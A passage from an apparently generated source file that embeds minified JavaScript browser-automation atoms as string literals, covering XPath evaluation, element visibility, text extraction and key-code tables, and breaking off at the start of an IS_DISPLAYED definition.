"a==b)return 0;if(a.compareDocumentPosition)return a.compareDocumentPosi"\
"tion(b)&2?1:-1;if(\"sourceIndex\"in a||a.parentNode&&\"sourceIndex\"in "\
"a.parentNode){var c=1==a.nodeType,d=1==b.nodeType;if(c&&d)return a.sour"\
"ceIndex-b.sourceIndex;var e=a.parentNode,g=b.parentNode;return e==g?va("\
"a,b):!c&&ta(e,b)?-1*wa(a,b):!d&&ta(g,a)?wa(b,a):(c?a.sourceIndex:e.sour"\
"ceIndex)-(d?b.sourceIndex:g.sourceIndex)}d=C(a);c=d.createRange();c.sel"\
"ectNode(a);c.collapse(!0);d=d.createRange();d.selectNode(b);\nd.collaps"\
"e(!0);return c.compareBoundaryPoints(k.Range.START_TO_END,d)}function w"\
"a(a,b){var c=a.parentNode;if(c==b)return-1;for(var d=b;d.parentNode!=c;"\
")d=d.parentNode;return va(d,a)}function va(a,b){for(var c=b;c=c.previou"\
"sSibling;)if(c==a)return-1;return 1}function C(a){return 9==a.nodeType?"\
"a:a.ownerDocument||a.document}function xa(a,b){a=a.parentNode;for(var c"\
"=0;a;){if(b(a))return a;a=a.parentNode;c++}return null}function D(a){th"\
"is.B=a||k.document||document}\nfunction ya(a){var b=a.B;a=b.body;b=b.pa"\
"rentWindow||b.defaultView;return new z(b.pageXOffset||a.scrollLeft,b.pa"\
"geYOffset||a.scrollTop)}D.prototype.contains=ta;function E(a){var b=nul"\
"l,c=a.nodeType;1==c&&(b=a.textContent,b=void 0==b||null==b?a.innerText:"\
"b,b=void 0==b||null==b?\"\":b);if(\"string\"!=typeof b)if(9==c||1==c){a"\
"=9==c?a.documentElement:a.firstChild;for(var c=0,d=[],b=\"\";a;){do 1!="\
"a.nodeType&&(b+=a.nodeValue),d[c++]=a;while(a=a.firstChild);for(;c&&!(a"\
"=d[--c].nextSibling););}}else b=a.nodeValue;return\"\"+b}\nfunction F(a"\
",b,c){if(null===b)return!0;try{if(!a.getAttribute)return!1}catch(d){ret"\
"urn!1}return null==c?!!a.getAttribute(b):a.getAttribute(b,2)==c}functio"\
"n G(a,b,c,d,e){return za.call(null,a,b,m(c)?c:null,m(d)?d:null,e||new H"\
")}\nfunction za(a,b,c,d,e){b.getElementsByName&&d&&\"name\"==c?(b=b.get"\
"ElementsByName(d),p(b,function(b){a.matches(b)&&e.add(b)})):b.getElemen"\
"tsByClassName&&d&&\"class\"==c?(b=b.getElementsByClassName(d),p(b,funct"\
"ion(b){b.className==d&&a.matches(b)&&e.add(b)})):b.getElementsByTagName"\
"&&(b=b.getElementsByTagName(a.getName()),p(b,function(a){F(a,c,d)&&e.ad"\
"d(a)}));return e}function Aa(a,b,c,d,e){for(b=b.firstChild;b;b=b.nextSi"\
"bling)F(b,c,d)&&a.matches(b)&&e.add(b);return e};function H(){this.g=th"\
"is.f=null;this.m=0}function Ba(a){this.t=a;this.next=this.o=null}H.prot"\
"otype.unshift=function(a){a=new Ba(a);a.next=this.f;this.g?this.f.o=a:t"\
"his.f=this.g=a;this.f=a;this.m++};H.prototype.add=function(a){a=new Ba("\
"a);a.o=this.g;this.f?this.g.next=a:this.f=this.g=a;this.g=a;this.m++};f"\
"unction Ca(a){return(a=a.f)?a.t:null}function I(a){return new Da(a,!1)}"\
"function Da(a,b){this.Q=a;this.q=(this.u=b)?a.g:a.f;this.C=null}\nDa.pr"\
"ototype.next=function(){var a=this.q;if(null==a)return null;var b=this."\
"C=a;this.q=this.u?a.o:a.next;return b.t};function J(a,b,c,d,e){b=b.eval"\
"uate(d);c=c.evaluate(d);var g;if(b instanceof H&&c instanceof H){e=I(b)"\
";for(d=e.next();d;d=e.next())for(b=I(c),g=b.next();g;g=b.next())if(a(E("\
"d),E(g)))return!0;return!1}if(b instanceof H||c instanceof H){b instanc"\
"eof H?e=b:(e=c,c=b);e=I(e);b=typeof c;for(d=e.next();d;d=e.next()){swit"\
"ch(b){case \"number\":d=+E(d);break;case \"boolean\":d=!!E(d);break;cas"\
"e \"string\":d=E(d);break;default:throw Error(\"Illegal primitive type "\
"for comparison.\");}if(a(d,c))return!0}return!1}return e?\n\"boolean\"="\
"=typeof b||\"boolean\"==typeof c?a(!!b,!!c):\"number\"==typeof b||\"num"\
"ber\"==typeof c?a(+b,+c):a(b,c):a(+b,+c)}function Ea(a,b,c,d){this.D=a;"\
"this.S=b;this.A=c;this.k=d}Ea.prototype.toString=function(){return this"\
".D};var Fa={};function K(a,b,c,d){if(a in Fa)throw Error(\"Binary opera"\
"tor already created: \"+a);a=new Ea(a,b,c,d);Fa[a.toString()]=a}K(\"div"\
"\",6,1,function(a,b,c){return a.d(c)/b.d(c)});K(\"mod\",6,1,function(a,"\
"b,c){return a.d(c)%b.d(c)});K(\"*\",6,1,function(a,b,c){return a.d(c)*b"\
".d(c)});\nK(\"+\",5,1,function(a,b,c){return a.d(c)+b.d(c)});K(\"-\",5,"\
"1,function(a,b,c){return a.d(c)-b.d(c)});K(\"<\",4,2,function(a,b,c){re"\
"turn J(function(a,b){return a<b},a,b,c)});K(\">\",4,2,function(a,b,c){r"\
"eturn J(function(a,b){return a>b},a,b,c)});K(\"<=\",4,2,function(a,b,c)"\
"{return J(function(a,b){return a<=b},a,b,c)});K(\">=\",4,2,function(a,b"\
",c){return J(function(a,b){return a>=b},a,b,c)});K(\"=\",3,2,function(a"\
",b,c){return J(function(a,b){return a==b},a,b,c,!0)});\nK(\"!=\",3,2,fu"\
"nction(a,b,c){return J(function(a,b){return a!=b},a,b,c,!0)});K(\"and\""\
",2,2,function(a,b,c){return a.j(c)&&b.j(c)});K(\"or\",1,2,function(a,b,"\
"c){return a.j(c)||b.j(c)});function Ga(a,b,c,d,e,g,h,u,n){this.n=a;this"\
".A=b;this.P=c;this.O=d;this.N=e;this.k=g;this.M=h;this.L=void 0!==u?u:h"\
";this.R=!!n}Ga.prototype.toString=function(){return this.n};var Ha={};f"\
"unction L(a,b,c,d,e,g,h,u){if(a in Ha)throw Error(\"Function already cr"\
"eated: \"+a+\".\");Ha[a]=new Ga(a,b,c,d,!1,e,g,h,u)}L(\"boolean\",2,!1,"\
"!1,function(a,b){return b.j(a)},1);L(\"ceiling\",1,!1,!1,function(a,b){"\
"return Math.ceil(b.d(a))},1);\nL(\"concat\",3,!1,!1,function(a,b){var c"\
"=fa(arguments,1);return da(c,function(b,c){return b+c.c(a)})},2,null);L"\
"(\"contains\",2,!1,!1,function(a,b,c){b=b.c(a);a=c.c(a);return-1!=b.ind"\
"exOf(a)},2);L(\"count\",1,!1,!1,function(a,b){return b.evaluate(a).m},1"\
",1,!0);L(\"false\",2,!1,!1,f(!1),0);L(\"floor\",1,!1,!1,function(a,b){r"\
"eturn Math.floor(b.d(a))},1);\nL(\"id\",4,!1,!1,function(a,b){var c=a.h"\
"(),d=9==c.nodeType?c:c.ownerDocument,c=b.c(a).split(/\\s+/),e=[];p(c,fu"\
"nction(a){(a=d.getElementById(a))&&!q(e,a)&&e.push(a)});e.sort(ua);var "\
"g=new H;p(e,function(a){g.add(a)});return g},1);L(\"lang\",2,!1,!1,f(!1"\
"),1);L(\"last\",1,!0,!1,function(a){if(1!=arguments.length)throw Error("\
"\"Function last expects ()\");return a.I()},0);L(\"local-name\",3,!1,!0"\
",function(a,b){var c=b?Ca(b.evaluate(a)):a.h();return c?c.nodeName.toLo"\
"werCase():\"\"},0,1,!0);\nL(\"name\",3,!1,!0,function(a,b){var c=b?Ca(b"\
".evaluate(a)):a.h();return c?c.nodeName.toLowerCase():\"\"},0,1,!0);L("\
"\"namespace-uri\",3,!0,!1,f(\"\"),0,1,!0);L(\"normalize-space\",3,!1,!0"\
",function(a,b){return(b?b.c(a):E(a.h())).replace(/[\\s\\xa0]+/g,\" \")."\
"replace(/^\\s+|\\s+$/g,\"\")},0,1);L(\"not\",2,!1,!1,function(a,b){retu"\
"rn!b.j(a)},1);L(\"number\",1,!1,!0,function(a,b){return b?b.d(a):+E(a.h"\
"())},0,1);L(\"position\",1,!0,!1,function(a){return a.J()},0);L(\"round"\
"\",1,!1,!1,function(a,b){return Math.round(b.d(a))},1);\nL(\"starts-wit"\
"h\",2,!1,!1,function(a,b,c){b=b.c(a);a=c.c(a);return 0==b.lastIndexOf(a"\
",0)},2);L(\"string\",3,!1,!0,function(a,b){return b?b.c(a):E(a.h())},0,"\
"1);L(\"string-length\",1,!1,!0,function(a,b){return(b?b.c(a):E(a.h()))."\
"length},0,1);\nL(\"substring\",3,!1,!1,function(a,b,c,d){c=c.d(a);if(is"\
"NaN(c)||Infinity==c||-Infinity==c)return\"\";d=d?d.d(a):Infinity;if(isN"\
"aN(d)||-Infinity===d)return\"\";c=Math.round(c)-1;var e=Math.max(c,0);a"\
"=b.c(a);if(Infinity==d)return a.substring(e);b=Math.round(d);return a.s"\
"ubstring(e,c+b)},2,3);L(\"substring-after\",3,!1,!1,function(a,b,c){b=b"\
".c(a);a=c.c(a);c=b.indexOf(a);return-1==c?\"\":b.substring(c+a.length)}"\
",2);\nL(\"substring-before\",3,!1,!1,function(a,b,c){b=b.c(a);a=c.c(a);"\
"a=b.indexOf(a);return-1==a?\"\":b.substring(0,a)},2);L(\"sum\",1,!1,!1,"\
"function(a,b){for(var c=I(b.evaluate(a)),d=0,e=c.next();e;e=c.next())d+"\
"=+E(e);return d},1,1,!0);L(\"translate\",3,!1,!1,function(a,b,c,d){b=b."\
"c(a);c=c.c(a);var e=d.c(a);a=[];for(d=0;d<c.length;d++){var g=c.charAt("\
"d);g in a||(a[g]=e.charAt(d))}c=\"\";for(d=0;d<b.length;d++)g=b.charAt("\
"d),c+=g in a?a[g]:g;return c},3);L(\"true\",2,!1,!1,f(!0),0);function I"\
"a(a,b,c,d){this.n=a;this.H=b;this.u=c;this.V=d}Ia.prototype.toString=fu"\
"nction(){return this.n};var Ja={};function M(a,b,c,d){if(a in Ja)throw "\
"Error(\"Axis already created: \"+a);Ja[a]=new Ia(a,b,c,!!d)}M(\"ancesto"\
"r\",function(a,b){for(var c=new H,d=b;d=d.parentNode;)a.matches(d)&&c.u"\
"nshift(d);return c},!0);M(\"ancestor-or-self\",function(a,b){var c=new "\
"H,d=b;do a.matches(d)&&c.unshift(d);while(d=d.parentNode);return c},!0)"\
";\nM(\"attribute\",function(a,b){var c=new H,d=a.getName(),e=b.attribut"\
"es;if(e)if(\"*\"==d)for(var d=0,g;g=e[d];d++)c.add(g);else(g=e.getNamed"\
"Item(d))&&c.add(g);return c},!1);M(\"child\",function(a,b,c,d,e){return"\
" Aa.call(null,a,b,m(c)?c:null,m(d)?d:null,e||new H)},!1,!0);M(\"descend"\
"ant\",G,!1,!0);M(\"descendant-or-self\",function(a,b,c,d){var e=new H;F"\
"(b,c,d)&&a.matches(b)&&e.add(b);return G(a,b,c,d,e)},!1,!0);\nM(\"follo"\
"wing\",function(a,b,c,d){var e=new H;do for(var g=b;g=g.nextSibling;)F("\
"g,c,d)&&a.matches(g)&&e.add(g),e=G(a,g,c,d,e);while(b=b.parentNode);ret"\
"urn e},!1,!0);M(\"following-sibling\",function(a,b){for(var c=new H,d=b"\
";d=d.nextSibling;)a.matches(d)&&c.add(d);return c},!1);M(\"namespace\","\
"function(){return new H},!1);M(\"parent\",function(a,b){var c=new H;if("\
"9==b.nodeType)return c;if(2==b.nodeType)return c.add(b.ownerElement),c;"\
"var d=b.parentNode;a.matches(d)&&c.add(d);return c},!1);\nM(\"preceding"\
"\",function(a,b,c,d){var e=new H,g=[];do g.unshift(b);while(b=b.parentN"\
"ode);for(var h=1,u=g.length;h<u;h++){var n=[];for(b=g[h];b=b.previousSi"\
"bling;)n.unshift(b);for(var A=0,Ya=n.length;A<Ya;A++)b=n[A],F(b,c,d)&&a"\
".matches(b)&&e.add(b),e=G(a,b,c,d,e)}return e},!0,!0);M(\"preceding-sib"\
"ling\",function(a,b){for(var c=new H,d=b;d=d.previousSibling;)a.matches"\
"(d)&&c.unshift(d);return c},!0);M(\"self\",function(a,b){var c=new H;a."\
"matches(b)&&c.add(b);return c},!1);var N={};N.v=function(){var a={W:\"h"\
"ttp://www.w3.org/2000/svg\"};return function(b){return a[b]||null}}();N"\
".k=function(a,b,c){var d=C(a);try{var e=d.createNSResolver?d.createNSRe"\
"solver(d.documentElement):N.v;return d.evaluate(b,a,e,c,null)}catch(g){"\
"throw new s(32,\"Unable to locate an element with the xpath expression "\
"\"+b+\" because of the following error:\\n\"+g);}};N.p=function(a,b){if"\
"(!a||1!=a.nodeType)throw new s(32,'The result of the xpath expression "\
"\"'+b+'\" is: '+a+\". It should be an element.\");};\nN.F=function(a,b)"\
"{var c=function(){var c=N.k(b,a,9);return c?c.singleNodeValue||null:b.s"\
"electSingleNode?(c=C(b),c.setProperty&&c.setProperty(\"SelectionLanguag"\
"e\",\"XPath\"),b.selectSingleNode(a)):null}();null===c||N.p(c,a);return"\
" c};\nN.K=function(a,b){var c=function(){var c=N.k(b,a,7);if(c){for(var"\
" e=c.snapshotLength,g=[],h=0;h<e;++h)g.push(c.snapshotItem(h));return g"\
"}return b.selectNodes?(c=C(b),c.setProperty&&c.setProperty(\"SelectionL"\
"anguage\",\"XPath\"),b.selectNodes(a)):[]}();p(c,function(b){N.p(b,a)})"\
";return c};function O(a,b,c,d){this.left=a;this.top=b;this.width=c;this"\
".height=d}O.prototype.toString=function(){return\"(\"+this.left+\", \"+"\
"this.top+\" - \"+this.width+\"w x \"+this.height+\"h)\"};O.prototype.co"\
"ntains=function(a){return a instanceof O?this.left<=a.left&&this.left+t"\
"his.width>=a.left+a.width&&this.top<=a.top&&this.top+this.height>=a.top"\
"+a.height:a.x>=this.left&&a.x<=this.left+this.width&&a.y>=this.top&&a.y"\
"<=this.top+this.height};\nO.prototype.ceil=function(){this.left=Math.ce"\
"il(this.left);this.top=Math.ceil(this.top);this.width=Math.ceil(this.wi"\
"dth);this.height=Math.ceil(this.height);return this};O.prototype.floor="\
"function(){this.left=Math.floor(this.left);this.top=Math.floor(this.top"\
");this.width=Math.floor(this.width);this.height=Math.floor(this.height)"\
";return this};\nO.prototype.round=function(){this.left=Math.round(this."\
"left);this.top=Math.round(this.top);this.width=Math.round(this.width);t"\
"his.height=Math.round(this.height);return this};function Ka(a,b){var c="\
"C(a);return c.defaultView&&c.defaultView.getComputedStyle&&(c=c.default"\
"View.getComputedStyle(a,null))?c[b]||c.getPropertyValue(b)||\"\":\"\"}f"\
"unction P(a){return Ka(a,\"position\")||(a.currentStyle?a.currentStyle."\
"position:null)||a.style&&a.style.position}function La(a){var b;try{b=a."\
"getBoundingClientRect()}catch(c){return{left:0,top:0,right:0,bottom:0}}"\
"return b}\nfunction Ma(a){var b=C(a),c=P(a),d=\"fixed\"==c||\"absolute"\
"\"==c;for(a=a.parentNode;a&&a!=b;a=a.parentNode)if(c=P(a),d=d&&\"static"\
"\"==c&&a!=b.documentElement&&a!=b.body,!d&&(a.scrollWidth>a.clientWidth"\
"||a.scrollHeight>a.clientHeight||\"fixed\"==c||\"absolute\"==c||\"relat"\
"ive\"==c))return a;return null}\nfunction Na(a){if(1==a.nodeType){var b"\
";if(a.getBoundingClientRect)b=La(a),b=new z(b.left,b.top);else{b=ya(a?n"\
"ew D(C(a)):y||(y=new D));var c=C(a),d=P(a),e=new z(0,0),g=(c?C(c):docum"\
"ent).documentElement;if(a!=g)if(a.getBoundingClientRect)a=La(a),c=ya(c?"\
"new D(C(c)):y||(y=new D)),e.x=a.left+c.x,e.y=a.top+c.y;else if(c.getBox"\
"ObjectFor)a=c.getBoxObjectFor(a),c=c.getBoxObjectFor(g),e.x=a.screenX-c"\
".screenX,e.y=a.screenY-c.screenY;else{var h=a;do{e.x+=h.offsetLeft;e.y+"\
"=h.offsetTop;h!=a&&(e.x+=h.clientLeft||\n0,e.y+=h.clientTop||0);if(\"fi"\
"xed\"==P(h)){e.x+=c.body.scrollLeft;e.y+=c.body.scrollTop;break}h=h.off"\
"setParent}while(h&&h!=a);\"absolute\"==d&&(e.y-=c.body.offsetTop);for(h"\
"=a;(h=Ma(h))&&h!=c.body&&h!=g;)e.x-=h.scrollLeft,e.y-=h.scrollTop}b=new"\
" z(e.x-b.x,e.y-b.y)}return b}b=\"function\"==l(a.r);e=a;a.targetTouches"\
"?e=a.targetTouches[0]:b&&a.r().targetTouches&&(e=a.r().targetTouches[0]"\
");return new z(e.clientX,e.clientY)};function Q(a,b){return!!a&&1==a.no"\
"deType&&(!b||a.tagName.toUpperCase()==b)}function R(a){for(a=a.parentNo"\
"de;a&&1!=a.nodeType&&9!=a.nodeType&&11!=a.nodeType;)a=a.parentNode;retu"\
"rn Q(a)?a:null}\nfunction S(a,b){var c=ba(b);if(\"float\"==c||\"cssFloa"\
"t\"==c||\"styleFloat\"==c)c=\"cssFloat\";c=Ka(a,c)||Oa(a,c);if(null===c"\
")c=null;else if(q(ga,b)&&(ja.test(\"#\"==c.charAt(0)?c:\"#\"+c)||na(c)."\
"length||r&&r[c.toLowerCase()]||la(c).length)){var d=la(c);if(!d.length)"\
"{a:if(d=na(c),!d.length){d=(d=r[c.toLowerCase()])?d:\"#\"==c.charAt(0)?"\
"c:\"#\"+c;if(ja.test(d)&&(d=ia(d),d=ia(d),d=[parseInt(d.substr(1,2),16)"\
",parseInt(d.substr(3,2),16),parseInt(d.substr(5,2),16)],d.length))break"\
" a;d=[]}3==d.length&&d.push(1)}c=4!=d.length?\nc:\"rgba(\"+d.join(\", "\
"\")+\")\"}return c}function Oa(a,b){var c=a.currentStyle||a.style,d=c[b"\
"];void 0===d&&\"function\"==l(c.getPropertyValue)&&(d=c.getPropertyValu"\
"e(b));return\"inherit\"!=d?void 0!==d?d:null:(c=R(a))?Oa(c,b):null}\nfu"\
"nction Pa(a,b){function c(a){if(\"none\"==S(a,\"display\"))return!1;a=R"\
"(a);return!a||c(a)}function d(a){var b=T(a);return 0<b.height&&0<b.widt"\
"h?!0:Q(a,\"PATH\")&&(0<b.height||0<b.width)?(a=S(a,\"stroke-width\"),!!"\
"a&&0<parseInt(a,10)):\"hidden\"!=S(a,\"overflow\")&&ea(a.childNodes,fun"\
"ction(a){return a.nodeType==ra||Q(a)&&d(a)})}function e(a){var b=S(a,\""\
"-o-transform\")||S(a,\"-webkit-transform\")||S(a,\"-ms-transform\")||S("\
"a,\"-moz-transform\")||S(a,\"transform\");if(b&&\"none\"!==b)return b=N"\
"a(a),a=T(a),0<=b.x+a.width&&\n0<=b.y+a.height?!0:!1;a=R(a);return!a||e("\
"a)}if(!Q(a))throw Error(\"Argument to isShown must be of type Element\""\
");if(Q(a,\"OPTION\")||Q(a,\"OPTGROUP\")){var g=xa(a,function(a){return "\
"Q(a,\"SELECT\")});return!!g&&Pa(g,!0)}return(g=Qa(a))?!!g.s&&0<g.rect.w"\
"idth&&0<g.rect.height&&Pa(g.s,b):Q(a,\"INPUT\")&&\"hidden\"==a.type.toL"\
"owerCase()||Q(a,\"NOSCRIPT\")||\"hidden\"==S(a,\"visibility\")||!c(a)||"\
"!b&&0==Ra(a)||!d(a)||Sa(a)==U?!1:e(a)}var U=\"hidden\";\nfunction Sa(a)"\
"{function b(a){var b=a;if(\"visible\"==u)if(a==g)b=h;else if(a==h)retur"\
"n{x:\"visible\",y:\"visible\"};b={x:S(b,\"overflow-x\"),y:S(b,\"overflo"\
"w-y\")};a==g&&(b.x=\"hidden\"==b.x?\"hidden\":\"auto\",b.y=\"hidden\"=="\
"b.y?\"hidden\":\"auto\");return b}function c(a){var b=S(a,\"position\")"\
";if(\"fixed\"==b)return g;for(a=R(a);a&&a!=g&&(0==S(a,\"display\").last"\
"IndexOf(\"inline\",0)||\"absolute\"==b&&\"static\"==S(a,\"position\"));"\
")a=R(a);return a}var d=T(a),e=C(a),g=e.documentElement,h=e.body,u=S(g,"\
"\"overflow\");for(a=c(a);a;a=\nc(a)){var n=T(a),e=b(a),A=d.left>=n.left"\
"+n.width,n=d.top>=n.top+n.height;if(A&&\"hidden\"==e.x||n&&\"hidden\"=="\
"e.y)return U;if(A&&\"visible\"!=e.x||n&&\"visible\"!=e.y)return Sa(a)=="\
"U?U:\"scroll\"}return\"none\"}\nfunction T(a){var b=Qa(a);if(b)return b"\
".rect;if(\"function\"==l(a.getBBox))try{var c=a.getBBox();return new O("\
"c.x,c.y,c.width,c.height)}catch(d){throw d;}else{if(Q(a,\"HTML\"))retur"\
"n a=((C(a)?C(a).parentWindow||C(a).defaultView:window)||window).documen"\
"t,a=\"CSS1Compat\"==a.compatMode?a.documentElement:a.body,a=new B(a.cli"\
"entWidth,a.clientHeight),new O(0,0,a.width,a.height);var b=Na(a),c=a.of"\
"fsetWidth,e=a.offsetHeight;c||(e||!a.getBoundingClientRect)||(a=a.getBo"\
"undingClientRect(),c=a.right-a.left,e=a.bottom-\na.top);return new O(b."\
"x,b.y,c,e)}}function Qa(a){var b=Q(a,\"MAP\");if(!b&&!Q(a,\"AREA\"))ret"\
"urn null;var c=b?a:Q(a.parentNode,\"MAP\")?a.parentNode:null,d=null,e=n"\
"ull;if(c&&c.name&&(d=N.F('/descendant::*[@usemap = \"#'+c.name+'\"]',C("\
"c)))&&(e=T(d),!b&&\"default\"!=a.shape.toLowerCase())){var g=Ta(a);a=Ma"\
"th.min(Math.max(g.left,0),e.width);b=Math.min(Math.max(g.top,0),e.heigh"\
"t);c=Math.min(g.width,e.width-a);g=Math.min(g.height,e.height-b);e=new "\
"O(a+e.left,b+e.top,c,g)}return{s:d,rect:e||new O(0,0,0,0)}}\nfunction T"\
"a(a){var b=a.shape.toLowerCase();a=a.coords.split(\",\");if(\"rect\"==b"\
"&&4==a.length){var b=a[0],c=a[1];return new O(b,c,a[2]-b,a[3]-c)}if(\"c"\
"ircle\"==b&&3==a.length)return b=a[2],new O(a[0]-b,a[1]-b,2*b,2*b);if("\
"\"poly\"==b&&2<a.length){for(var b=a[0],c=a[1],d=b,e=c,g=2;g+1<a.length"\
";g+=2)b=Math.min(b,a[g]),d=Math.max(d,a[g]),c=Math.min(c,a[g+1]),e=Math"\
".max(e,a[g+1]);return new O(b,c,d-b,e-c)}return new O(0,0,0,0)}function"\
" Ua(a){return a.replace(/^[^\\S\\xa0]+|[^\\S\\xa0]+$/g,\"\")}\nfunction"\
" Va(a,b){if(Q(a,\"BR\"))b.push(\"\");else{var c=Q(a,\"TD\"),d=S(a,\"dis"\
"play\"),e=!c&&!q(Wa,d),g=void 0!=a.previousElementSibling?a.previousEle"\
"mentSibling:sa(a.previousSibling),g=g?S(g,\"display\"):\"\",h=S(a,\"flo"\
"at\")||S(a,\"cssFloat\")||S(a,\"styleFloat\");!e||(\"run-in\"==g&&\"non"\
"e\"==h||/^[\\s\\xa0]*$/.test(b[b.length-1]||\"\"))||b.push(\"\");var u="\
"Pa(a),n=null,A=null;u&&(n=S(a,\"white-space\"),A=S(a,\"text-transform\""\
"));p(a.childNodes,function(a){a.nodeType==ra&&u?Xa(a,b,n,A):Q(a)&&Va(a,"\
"b)});g=b[b.length-1]||\"\";!c&&\n\"table-cell\"!=d||(!g||aa(g))||(b[b.l"\
"ength-1]+=\" \");e&&(\"run-in\"!=d&&!/^[\\s\\xa0]*$/.test(g))&&b.push("\
"\"\")}}var Wa=\"inline inline-block inline-table none table-cell table-"\
"column table-column-group\".split(\" \");\nfunction Xa(a,b,c,d){a=a.nod"\
"eValue.replace(/\\u200b/g,\"\");a=a.replace(/(\\r\\n|\\r|\\n)/g,\"\\n\""\
");if(\"normal\"==c||\"nowrap\"==c)a=a.replace(/\\n/g,\" \");a=\"pre\"=="\
"c||\"pre-wrap\"==c?a.replace(/[ \\f\\t\\v\\u2028\\u2029]/g,\"\\u00a0\")"\
":a.replace(/[\\ \\f\\t\\v\\u2028\\u2029]+/g,\" \");\"capitalize\"==d?a="\
"a.replace(/(^|\\s)(\\S)/g,function(a,b,c){return b+c.toUpperCase()}):\""\
"uppercase\"==d?a=a.toUpperCase():\"lowercase\"==d&&(a=a.toLowerCase());"\
"c=b.pop()||\"\";aa(c)&&0==a.lastIndexOf(\" \",0)&&(a=a.substr(1));b.pus"\
"h(c+a)}\nfunction Ra(a){var b=1,c=S(a,\"opacity\");c&&(b=Number(c));(a="\
"R(a))&&(b*=Ra(a));return b};function V(a,b){this.i={};this.e=[];var c=a"\
"rguments.length;if(1<c){if(c%2)throw Error(\"Uneven number of arguments"\
"\");for(var d=0;d<c;d+=2)this.set(arguments[d],arguments[d+1])}else if("\
"a){var e;if(a instanceof V)for(d=Za(a),$a(a),e=[],c=0;c<a.e.length;c++)"\
"e.push(a.i[a.e[c]]);else{var c=[],g=0;for(d in a)c[g++]=d;d=c;c=[];g=0;"\
"for(e in a)c[g++]=a[e];e=c}for(c=0;c<d.length;c++)this.set(d[c],e[c])}}"\
"V.prototype.l=0;V.prototype.G=0;function Za(a){$a(a);return a.e.concat("\
")}\nfunction $a(a){if(a.l!=a.e.length){for(var b=0,c=0;b<a.e.length;){v"\
"ar d=a.e[b];Object.prototype.hasOwnProperty.call(a.i,d)&&(a.e[c++]=d);b"\
"++}a.e.length=c}if(a.l!=a.e.length){for(var e={},c=b=0;b<a.e.length;)d="\
"a.e[b],Object.prototype.hasOwnProperty.call(e,d)||(a.e[c++]=d,e[d]=1),b"\
"++;a.e.length=c}}V.prototype.get=function(a,b){return Object.prototype."\
"hasOwnProperty.call(this.i,a)?this.i[a]:b};\nV.prototype.set=function(a"\
",b){Object.prototype.hasOwnProperty.call(this.i,a)||(this.l++,this.e.pu"\
"sh(a),this.G++);this.i[a]=b};var ab={};function W(a,b,c){var d=typeof a"\
";(\"object\"==d&&null!=a||\"function\"==d)&&(a=a.a);a=new bb(a,b,c);!b|"\
"|b in ab&&!c||(ab[b]={key:a,shift:!1},c&&(ab[c]={key:a,shift:!0}));retu"\
"rn a}function bb(a,b,c){this.code=a;this.w=b||null;this.T=c||this.w}W(8"\
");W(9);W(13);var cb=W(16),db=W(17),eb=W(18);W(19);W(20);W(27);W(32,\" "\
"\");W(33);W(34);W(35);W(36);W(37);W(38);W(39);W(40);W(44);W(45);W(46);W"\
"(48,\"0\",\")\");W(49,\"1\",\"!\");W(50,\"2\",\"@\");W(51,\"3\",\"#\");"\
"W(52,\"4\",\"$\");W(53,\"5\",\"%\");W(54,\"6\",\"^\");W(55,\"7\",\"&\")"\
";\nW(56,\"8\",\"*\");W(57,\"9\",\"(\");W(65,\"a\",\"A\");W(66,\"b\",\"B"\
"\");W(67,\"c\",\"C\");W(68,\"d\",\"D\");W(69,\"e\",\"E\");W(70,\"f\",\""\
"F\");W(71,\"g\",\"G\");W(72,\"h\",\"H\");W(73,\"i\",\"I\");W(74,\"j\","\
"\"J\");W(75,\"k\",\"K\");W(76,\"l\",\"L\");W(77,\"m\",\"M\");W(78,\"n\""\
",\"N\");W(79,\"o\",\"O\");W(80,\"p\",\"P\");W(81,\"q\",\"Q\");W(82,\"r"\
"\",\"R\");W(83,\"s\",\"S\");W(84,\"t\",\"T\");W(85,\"u\",\"U\");W(86,\""\
"v\",\"V\");W(87,\"w\",\"W\");W(88,\"x\",\"X\");W(89,\"y\",\"Y\");W(90,"\
"\"z\",\"Z\");var fb=W(v?{b:91,a:91,opera:219}:t?{b:224,a:91,opera:17}:{"\
"b:0,a:91,opera:null});\nW(v?{b:92,a:92,opera:220}:t?{b:224,a:93,opera:1"\
"7}:{b:0,a:92,opera:null});W(v?{b:93,a:93,opera:0}:t?{b:0,a:0,opera:16}:"\
"{b:93,a:null,opera:0});W({b:96,a:96,opera:48},\"0\");W({b:97,a:97,opera"\
":49},\"1\");W({b:98,a:98,opera:50},\"2\");W({b:99,a:99,opera:51},\"3\")"\
";W({b:100,a:100,opera:52},\"4\");W({b:101,a:101,opera:53},\"5\");W({b:1"\
"02,a:102,opera:54},\"6\");W({b:103,a:103,opera:55},\"7\");W({b:104,a:10"\
"4,opera:56},\"8\");W({b:105,a:105,opera:57},\"9\");W({b:106,a:106,opera"\
":x?56:42},\"*\");W({b:107,a:107,opera:x?61:43},\"+\");\nW({b:109,a:109,"\
"opera:x?109:45},\"-\");W({b:110,a:110,opera:x?190:78},\".\");W({b:111,a"\
":111,opera:x?191:47},\"/\");W(144);W(112);W(113);W(114);W(115);W(116);W"\
"(117);W(118);W(119);W(120);W(121);W(122);W(123);W({b:107,a:187,opera:61"\
"},\"=\",\"+\");W(108,\",\");W({b:109,a:189,opera:109},\"-\",\"_\");W(18"\
"8,\",\",\"<\");W(190,\".\",\">\");W(191,\"/\",\"?\");W(192,\"`\",\"~\")"\
";W(219,\"[\",\"{\");W(220,\"\\\\\",\"|\");W(221,\"]\",\"}\");W({b:59,a:"\
"186,opera:59},\";\",\":\");W(222,\"'\",'\"');var X=new V;X.set(1,cb);X."\
"set(2,db);X.set(4,eb);X.set(8,fb);\n(function(a){var b=new V;p(Za(a),fu"\
"nction(c){b.set(a.get(c).code,c)});return b})(X);function gb(a){var b=["\
"];Va(a,b);var c=b;a=c.length;for(var b=Array(a),c=m(c)?c.split(\"\"):c,"\
"d=0;d<a;d++)d in c&&(b[d]=Ua.call(void 0,c[d]));return Ua(b.join(\"\\n"\
"\")).replace(/\\xa0/g,\" \")}var Y=[\"_\"],Z=k;Y[0]in Z||!Z.execScript|"\
"|Z.execScript(\"var \"+Y[0]);for(var $;Y.length&&($=Y.shift());)Y.lengt"\
"h||void 0===gb?Z=Z[$]?Z[$]:Z[$]={}:Z[$]=gb;; return this._.apply(null,a"\
"rguments);}.apply({navigator:typeof window!=undefined?window.navigator:"\
"null,document:typeof window!=undefined?window.document:null}, arguments"\
");}"
IS_DISPLAYED = \
"function(){return function(){function h(a){return function(){return a}}"\
"var k=this;\nfunction l(a){var b=typeof a;if(\"object\"==b)if(a){if(a i"\
"nstanceof Array)return\"array\";if(a instanceof Object)return b;var c=O"\
